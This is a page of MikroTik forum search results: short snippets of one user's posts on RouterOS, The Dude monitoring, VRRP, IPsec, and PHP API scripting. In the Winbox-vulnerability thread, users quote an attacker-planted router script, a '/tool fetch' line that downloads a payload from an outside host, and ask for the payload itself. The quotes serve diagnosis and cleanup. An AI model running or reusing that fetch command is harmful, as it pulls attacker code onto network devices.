Community discussions

MikroTik App

Search found 59 matches

by excession
Mon Oct 12, 2020 4:33 pm
Forum: General
Topic: L2 Design for PPPOE Service Delivery
Replies: 2
Views: 252

Re: L2 Design for PPPOE Service Delivery

Great article, thank you very much! I have not included it here for simplicity, but we actually will have two AC's on site and it's my intention to make them both available to all clients. Since we won't have very many, possibly 10-20 PPPOE clients in the building, I had thought to just let each cli...
by excession
Mon Oct 12, 2020 2:04 pm
Forum: General
Topic: L2 Design for PPPOE Service Delivery
Replies: 2
Views: 252

L2 Design for PPPOE Service Delivery

Hi, we have a new build where we're going to offer internet service via PPPOE to various clients within a large building. A simplified view of the network is RTR -> Switch Stack -> PPPOE Clients. Simplified Overview: overview.PNG The switch stack will also be used for other things but I'm focused he...
by excession
Tue Sep 15, 2020 6:25 pm
Forum: The Dude
Topic: Dude show password
Replies: 1
Views: 697

Re: Dude show password

You, my friend, have re-discovered the wheel!
It's by design. Don't let anyone you don't trust with the password to every device, use your Dude...
by excession
Tue Sep 15, 2020 6:21 pm
Forum: The Dude
Topic: Custom Tool and IP referencing
Replies: 1
Views: 810

Re: Custom Tool and IP referencing

You can run a tool directly from any associated IP:
Capture.PNG
by excession
Tue Sep 15, 2020 6:14 pm
Forum: The Dude
Topic: Dude Device Name
Replies: 1
Views: 491

Re: Dude Device Name

Unfortunately you do have to set the device name manually. When I'm setting up a new map I often use the sysname OID on the appearance tab then manually set the device name as well. Alternatively when reverse DNS is available we sometimes use [Device.FirstDnsName] on the appearance tab instead, then...
by excession
Tue Sep 15, 2020 6:05 pm
Forum: The Dude
Topic: DDNS with AGENTs
Replies: 1
Views: 357

Re: DDNS with AGENTs

In v6> Dude, DNS names are allowed for adding devices. When those devices are ROS you can use them as agents as long as they are using exactly the same ROS version as your Dude server.
by excession
Tue Sep 15, 2020 5:56 pm
Forum: The Dude
Topic: Monitoring Mikrotik network with Zabbix - advice
Replies: 1
Views: 408

Re: Monitoring Mikrotik network with Zabbix - advice

Can you run windows commands from within Zabbix? In which case Winbox supports passing the following parameters. Try this in a run prompt: C:\winbox.exe IPAddress User Password (Above assumes you have winbox.exe in the root of your C: drive) All options are required to initialize the session without...
by excession
Tue Sep 15, 2020 2:47 pm
Forum: The Dude
Topic: Dude device bulk password change
Replies: 6
Views: 520

Re: Dude device bulk password change

Bash SSH script or Ansible if you have SSH enabled. Not as hard as you might think (assuming these are new to you). And since you can run any ROS command using the dude, although it’s designed to gather information, I’ve always thought it should be possible with the ROS CMD function in the Dude. Tho...
by excession
Mon Sep 14, 2020 5:54 pm
Forum: The Dude
Topic: Concatenate - how to properly escape double quotes?
Replies: 3
Views: 466

Re: Concatenate - how to properly escape double quotes?

Just throwing out this idea / haven't thought about it too hard / almost certainly won't work / wasting my time and yours...
Could you try calling the "FirstAddress" variable in a new dude function then use that dude function in it's place in your concatenate line?
by excession
Mon Sep 14, 2020 5:13 pm
Forum: The Dude
Topic: Dude device bulk password change
Replies: 6
Views: 520

Re: Dude device bulk password change

You can also make multi-device edits from the devices list, you can even filter that first if need be. Until Mikrotik develop an API for the Dude, this is your only practical solution. As I recall, someone did release their experiments decoding the Dude database on git-hub. They also alluded to the ...
by excession
Mon Aug 31, 2020 6:24 pm
Forum: Wireless Networking
Topic: Wifi Radar
Replies: 8
Views: 1469

Re: Wifi Radar

First create a system script with the following line, substitute your wlan interface name and the duration you want to run the snoop for, save it with the name "snoop": /interface wireless snooper flat-snoop wlan1 duration=5s Then run the following command to capture the output of that scr...
by excession
Sun Aug 30, 2020 5:25 pm
Forum: RouterBOARD hardware
Topic: SXTsq Getting Retired? (Out of stock in UK)
Replies: 1
Views: 346

SXTsq Getting Retired? (Out of stock in UK)

SXTsq 5 ac seems to be out of stock everywhere in the UK. Is this just due to Covid, are new units incoming? Doesn't seem to just be the 5 ac either, most SXTsq products seem to be quite difficult to get hold of right now and the 60ghz unit appears to have been replaced entirely by the new Cube lite...
by excession
Sun Jul 19, 2020 5:40 pm
Forum: The Dude
Topic: Practical VPN speed SSTP vs L2TP/IPSec [SOLVED]
Replies: 2
Views: 1390

Re: Practical VPN speed SSTP vs L2TP/IPSec [SOLVED]

We have both SSTP and L2TP/IPSEC setup on an RB3011. We see about 25mbps on SSTP and 40mbps on L2TP/IPSEC (an individual user testing one at a time), underlying connection is capable of 200mbps. We also deploy Soft-Ether quite often for our clients where they have either VMs or Windows servers avail...
by excession
Tue May 26, 2020 8:25 pm
Forum: The Dude
Topic: IPSEC Dude Monitoring Script
Replies: 0
Views: 769

IPSEC Dude Monitoring Script

Below is my first stab at getting IPSEC monitoring of a ROS device into the Dude interface. Right now I've made two versions of the script, one for status indicators on a device and the other for on a link. The script pulls from the IPSEC Policies table, filters out templates and disabled entries th...
by excession
Fri Mar 20, 2020 12:27 am
Forum: Beginner Basics
Topic: PTP link for shooting range camera.
Replies: 2
Views: 2243

Re: PTP link for shooting range camera.

Try station psudo-bridge instead of station bridge and put the wireless interface and the wired interface in a bridge together.
by excession
Thu Mar 19, 2020 1:16 am
Forum: General
Topic: Strange issue with IPSEC
Replies: 2
Views: 1154

Re: Strange issue with IPSEC

by excession
Thu Mar 19, 2020 12:47 am
Forum: General
Topic: Mikrotik and Sonicwall on same switch
Replies: 9
Views: 1911

Re: Mikrotik and Sonicwall on same switch

Or I suppose as an outlier you might have a weird firewall rule or bridge filter that could prevent such a ping, but that’s pretty unusual.
export hide-sensitive 
Post your config here if you want me to check.
by excession
Thu Mar 19, 2020 12:17 am
Forum: General
Topic: Mikrotik and Sonicwall on same switch
Replies: 9
Views: 1911

Re: Mikrotik and Sonicwall on same switch

If your PC’s get an IP and can ping the Sonicwall when plugged into the wall port directly but not when plugged into the pass through port then it has to be an issue with the pass through ports. I’m not familiar with Grandstream handsets but I have come across configs on IP phones that disable the p...
by excession
Wed Mar 18, 2020 11:31 pm
Forum: General
Topic: Mikrotik and Sonicwall on same switch
Replies: 9
Views: 1911

Re: Mikrotik and Sonicwall on same switch

Are you sure there aren’t any VLANs configured on the switch? If your subnets are on different VLANs you need to make sure the pass through ports on your phones are on the right VLAN, which in this case is probably a different VLAN to the one the phones themselves should be on. It’s common in this k...
by excession
Wed Mar 18, 2020 10:42 pm
Forum: General
Topic: I can´t see the network in Google Cloud Platform
Replies: 5
Views: 2752

Re: I can´t see the network in Google Cloud Platform

Ha! That's gold. Initially when I tried to follow your instruction I tried to route the remote subnet to the gateway address of the local subnet, which didn't work. When I simply selected the interface of the local subnet instead it worked. I'm guessing the difference is that instead of trying to pu...
by excession
Wed Mar 18, 2020 8:25 pm
Forum: General
Topic: Mikrotik and Sonicwall on same switch
Replies: 9
Views: 1911

Re: Mikrotik and Sonicwall on same switch

It’s hard to be sure of your topology from your description, however.... It sounds like you would benefit from knowing that you can assign multiple IP addresses on different subnets to the same interface on a Mikrotik. So just add an IP to the Mikrotik’s LAN port that’s on the same subnet as the Son...
by excession
Wed Mar 18, 2020 8:11 pm
Forum: General
Topic: I can´t see the network in Google Cloud Platform
Replies: 5
Views: 2752

Re: I can´t see the network in Google Cloud Platform

Try pinging through your Mikrotik router from a client on the LAN side to a host in your GCP subnet. I’ve never been able to get a Mikrotik IPSEC peer to be able to talk to a remote subnet when building IPSEC tunnels but clients on the LAN side have communicated happily through those same tunnels. I...
by excession
Sat Mar 14, 2020 1:28 am
Forum: RouterBOARD hardware
Topic: hardware idea for a multiport switch
Replies: 71
Views: 34204

Re: hardware idea for a multiport switch

It’s a fun idea, but I think I’d rather see a 2u front facing high density. Oh and stacking or expander functionality in ROS!
by excession
Sun Feb 16, 2020 11:19 am
Forum: RouterOS v7 BETA
Topic: VxLAN example configuration
Replies: 8
Views: 8812

Re: VxLAN example configuration

Thanks for sharing.
by excession
Sat Feb 15, 2020 4:20 pm
Forum: RouterOS v7 BETA
Topic: VRRP ros7 beta 5
Replies: 0
Views: 2730

VRRP ros7 beta 5

UPDATE: Looks like it was an issue with the Paravirtualized (virtio-net) adapter. Working properly now with the Intel MT1000 Desktop adapter. ---------- I'm having trouble getting my test setup to work on CHRs in VirtualBox. (Have tried enabling promiscuous mode on adapters as well.) VRRP interface ...
by excession
Wed Feb 12, 2020 8:57 pm
Forum: The Dude
Topic: Creating ping probe with source - IPsec monitoring
Replies: 1
Views: 2850

Re: Creating ping probe with source - IPsec monitoring

You can run a ROS cmd and use it's output in a device label: [ros_command(":put [/ip ipsec active-peers print]")] Or you could add a device from the other side of the link to your map and use that to indicate the status of the tunnel. Or a combination of the two with the ros cmd output dis...
by excession
Wed Feb 12, 2020 8:45 pm
Forum: The Dude
Topic: Non-RouterOS wireless SNMP readings
Replies: 1
Views: 2885

Re: Non-RouterOS wireless SNMP readings

You can display any OID value on a device map tile by modifying it's appearance settings.

Right click and Device on your map -> Appearance -> Label

You can use Insert OID to get an example to put a specific OID into or (having setup SNMP for that device) select the one you want from the list.
by excession
Wed Feb 12, 2020 8:39 pm
Forum: The Dude
Topic: Device types question (MikroTik Device/RouterOS)
Replies: 5
Views: 3604

Re: Device types question (MikroTik Device/RouterOS)

I will eagerly watch this thread for an answer, because I could never find any utility or advantage to specifying either of them. Mainly you can set specific map icons for particular device types. You can also set required services for a device type and use custom services to automatically set the ...
by excession
Wed Feb 12, 2020 8:28 pm
Forum: The Dude
Topic: Get list of devices from Dude server
Replies: 2
Views: 3363

Re: Get list of devices from Dude server

If you only need ROS devices, you can get a lot more info out of the CLI: /dude ros address print It's still not exactly what you want but with some additional processing and logic it might be workable. Or depending how your network is setup you could try de-duplicating the neighbors list: /dude ros...
by excession
Wed Feb 12, 2020 8:13 pm
Forum: The Dude
Topic: Some Mikrotik Icons
Replies: 7
Views: 6630

Re: Some Mikrotik Icons

Thanks!

Also, how? I'm guessing you did some kind of bulk conversion?
by excession
Wed Feb 12, 2020 8:00 pm
Forum: The Dude
Topic: hEX S CPU etc Stats
Replies: 1
Views: 2829

Re: hEX S CPU etc Stats

As far as I know you have to use SNMP for this.
by excession
Wed Feb 12, 2020 7:58 pm
Forum: The User Manager
Topic: USER Manager- Windows NPS
Replies: 1
Views: 3258

Re: USER Manager- Windows NPS

I've not tried this, however: Rather than try to use usermanger, I think what you want to do is set your NPS server as a direct RADIUS server for your Mikrotik then setup Mikrotik Vendor Specific Attributes in NPS to control bandwidth. Mikrotik Attributes: https://wiki.mikrotik.com/wiki/Manual:RADIU...
by excession
Wed Feb 12, 2020 7:44 pm
Forum: Wireless Networking
Topic: DPSK Dynamic WPA2 PSK support [SOLVED]
Replies: 8
Views: 7763

Re: DPSK Dynamic WPA2 PSK support [SOLVED]

This would be way more useful if the Access List didn't stop on the first failure but went on to try and validate against the next matching rule. You could then have multiple PSK's without defined MAC addresses allowing you to set different keys for different users without the need to pre-register M...
by excession
Wed Feb 12, 2020 6:07 pm
Forum: RouterOS v7 BETA
Topic: New User Manager in RouterOS v7
Replies: 67
Views: 50328

Re: New User Manager in RouterOS v7

Not seeing Mikrotik specific attributes in the docs: https://help.mikrotik.com/docs/display/ROS7/User+Manager How do we add Vendor Specific attributes? I'd like to be able to add: ATTRIBUTE Mikrotik-Wireless-PSK 16 string Or preferably have all Mikrotik attributes already defined. UPDATE: Looks like...
by excession
Sun Apr 21, 2019 2:14 am
Forum: General
Topic: Make external IP address accessible on secondary port
Replies: 8
Views: 1201

Re: Make external IP address accessible on secondary port

You could bridge two ports together and feed your WAN into one of these. Then set one of your external IPs on this bridge, plug your next router into the other port and set another of your external IPs on that routers interface. You can then enable the IP firewall in Bridge Settings on the first rou...
by excession
Thu Apr 11, 2019 10:53 pm
Forum: The Dude
Topic: Dude 6.41.2 lost SNMP interfaces
Replies: 26
Views: 8564

Re: Dude 6.41.2 lost SNMP interfaces

It’s not like the developers are unaware of these issues, almost certainly there’s a coder at Mikrotik who knows exactly what needs to be done to fix both this and several other stability issues but that it’s just not a priority for them at the moment, however much we would like it to be. It’s so fr...
by excession
Tue Jan 15, 2019 3:55 pm
Forum: The Dude
Topic: The Dude IS Dead, really, isn't it?
Replies: 41
Views: 15467

Re: The Dude IS Dead, really, isn't it?

Please, someone, where is the Dude?
Amen; let 2019 be the year of our Dude..
by excession
Fri Jan 04, 2019 3:08 pm
Forum: Wireless Networking
Topic: Whats is Oid for snr?
Replies: 10
Views: 4711

Re: Whats is Oid for snr?

GringoZ, There isnt an OID for everything you might need to have. However, the answer lies within the interface. As Normis says, you already used a command to show the OIDs. In the same case, the radio certainly knows what the SNR is, as well as many other valuable metrics. The radio is calculating...
by excession
Wed Nov 07, 2018 7:35 pm
Forum: The Dude
Topic: Dude 6.41.2 lost SNMP interfaces
Replies: 26
Views: 8564

Re: Dude 6.41.2 lost SNMP interfaces

Quitting the Dude client then re-opening it and waiting normally works for me.
by excession
Thu Sep 06, 2018 7:34 pm
Forum: The Dude
Topic: Export Map interval
Replies: 25
Views: 8371

Re: Export Map interval

+1 Please add
by excession
Fri Aug 31, 2018 5:07 pm
Forum: The Dude
Topic: Dude 6.41.2 lost SNMP interfaces
Replies: 26
Views: 8564

Re: Dude 6.41.2 lost SNMP interfaces

It wouldn’t be such an issue if I could get it to rediscover ports when this happens.

Sometimes quitting dude client and reconnecting seems to help rediscover lost ports; but not reliably.
by excession
Fri Aug 17, 2018 12:34 pm
Forum: The Dude
Topic: Dude v6 - Feature request list
Replies: 78
Views: 38270

Re: Dude v6 - Feature request list

Link line indicates which end the statistics for that link come from.
Something like a little bump or circle or perhaps an arrow at the end of the link line that shows you which end of the link the statistics are coming from.

Thanks!
by excession
Thu Aug 16, 2018 5:12 pm
Forum: The Dude
Topic: Dude v6 - Backup locally
Replies: 1
Views: 7604

Re: Dude v6 - Backup locally

This saved me a lot of time, thanks for sharing.
by excession
Thu Aug 16, 2018 2:34 pm
Forum: The Dude
Topic: Dude 6.41.2 lost SNMP interfaces
Replies: 26
Views: 8564

Re: Dude 6.41.2 lost SNMP interfaces

+1
This is still happening in 6.42.6. Any fix / workaround to force re-discovery of interfaces?
by excession
Wed Aug 08, 2018 3:19 am
Forum: Announcements
Topic: Winbox vulnerability: please upgrade
Replies: 329
Views: 123791

Re: Winbox vulnerability: please upgrade

Is he trying to use Winbox to connect No idea, but possible. how would you route a Winbox connection through a socks proxy? I assume that's a rhetorical question. Haha, actually no, just one based on an almost complete ignorance of socks! I did just find some interesting discussion here: https://fo...
by excession
Wed Aug 08, 2018 2:45 am
Forum: Announcements
Topic: Winbox vulnerability: please upgrade
Replies: 329
Views: 123791

Re: Winbox vulnerability: please upgrade

2. I have try to login to remote mikrotik with that password but no success so I think the problem come from the hacker allow only IP 127.0.0.1 to login with "sys" account. And the hacker use script to disable hard reset, so I just ask can I use the serial cable to login. (infected router...
by excession
Wed Aug 08, 2018 2:41 am
Forum: Announcements
Topic: Winbox vulnerability: please upgrade
Replies: 329
Views: 123791

Re: Winbox vulnerability: please upgrade

Thats it! THX! In scripts are /tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http Does anyone have the contents of the payload they can post? I've tried hitting the above but it's 404ing now. Thanks I grabbed the PHP file before fixing my router. I opened it with notepad a...
by excession
Sun Aug 05, 2018 3:04 pm
Forum: Announcements
Topic: Winbox vulnerability: please upgrade
Replies: 329
Views: 123791

Re: Winbox vulnerability: please upgrade

Thats it! THX!

In scripts are
/tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http
Does anyone have the contents of the payload they can post? I've tried hitting the above but it's 404ing now.

Thanks
by excession
Fri Aug 03, 2018 5:54 pm
Forum: Announcements
Topic: Winbox vulnerability: please upgrade
Replies: 329
Views: 123791

Re: Winbox vulnerability: please upgrade

Since the attacker is inserting his script into the targeted routers and changing configuration in them, we recommend to carefully inspect the configuration of your device, restore it from verified backups or export files, and follow generic advice in the above links. What sorts of changes are bein...
by excession
Fri Jul 06, 2018 12:19 pm
Forum: Scripting
Topic: VRRP Priority Script For Device Failover
Replies: 3
Views: 3562

Re: VRRP Priority Script For Device Failover

The above script worked fine for some time until we started to add VRRP interfaces on top of VLAN interfaces, these seem to take a little longer to negotiate state and in turn cause the master to bounce back and fourth between devices. Below are the script updates I've made to resolve the issue: #:l...
by excession
Mon Apr 16, 2018 12:03 pm
Forum: Scripting
Topic: VRRP Priority Script For Device Failover
Replies: 3
Views: 3562

VRRP Priority Script For Device Failover

Hi folks, I had some trouble finding script examples when I wanted to sync my VRRP interfaces. Thought I'd post my examples for what worked for me in the end, to hopefully signpost others. In my scenario: I wanted to ensure that all the VRRP interfaces across my two gateway devices had consistent st...
by excession
Sat May 16, 2015 3:39 pm
Forum: Scripting
Topic: PHP API fileGetContents problem
Replies: 7
Views: 1522

Re: PHP API fileGetContents problem

When I say "Manually" I mean; from Terminal on the device. Where I get a blank response if I run /system health print. The boxes that fail are both mipsbe: routerboard: yes model: 2011iL current-firmware: 3.18 routerboard: yes model: 751U-2HnD current-firmware: 2.37 You're right of course,...
by excession
Sat May 16, 2015 12:40 am
Forum: Scripting
Topic: PHP API fileGetContents problem
Replies: 7
Views: 1522

Re: PHP API fileGetContents problem

Ahh that's brilliant thank you very much. Actually it makes me think of another issue I'm having. I have one (so far as I've found) box that crashes my script if I try to get health data from it. It's v6.20 but I have another v6.20 box that works just fine. I've tried manually running this process o...
by excession
Fri May 15, 2015 4:48 pm
Forum: Scripting
Topic: PHP API fileGetContents problem
Replies: 7
Views: 1522

Re: PHP API fileGetContents problem

Hey, thanks for replying. I'm using php ver 5.4.24 and the export files I'm trying to transfer are all around 2k - 12k. I'm talking to various RouterOS versions but my test system is on ver 6.24. We ended up pushing rather than pulling just to have one less port open on these devices. Unfortunately ...
by excession
Thu May 14, 2015 10:19 pm
Forum: Scripting
Topic: PHP API fileGetContents problem
Replies: 7
Views: 1522

Re: PHP API fileGetContents problem

Couldn't get it to work. In the end I scripted pushing the export file to an FTP server from the target device. //ftp transfer export file $addRequest = new RouterOS\Request('/tool fetch'); $addRequest->setArgument('address', '***.***.***.***'); $addRequest->setArgument('src-path', 'auto_export.rsc'...
by excession
Mon May 11, 2015 8:25 pm
Forum: Scripting
Topic: PHP API fileGetContents problem
Replies: 7
Views: 1522

PHP API fileGetContents problem

Hi Folks, I'm having trouble reading files via the PHP API. My script will happily make a backup file but I'm then unable to get that file back to the webserver: $util = new RouterOS\Util( $client = new RouterOS\Client('******', '******', '******') ); $filename = 'backup.rsc'; $addRequest = new Rout...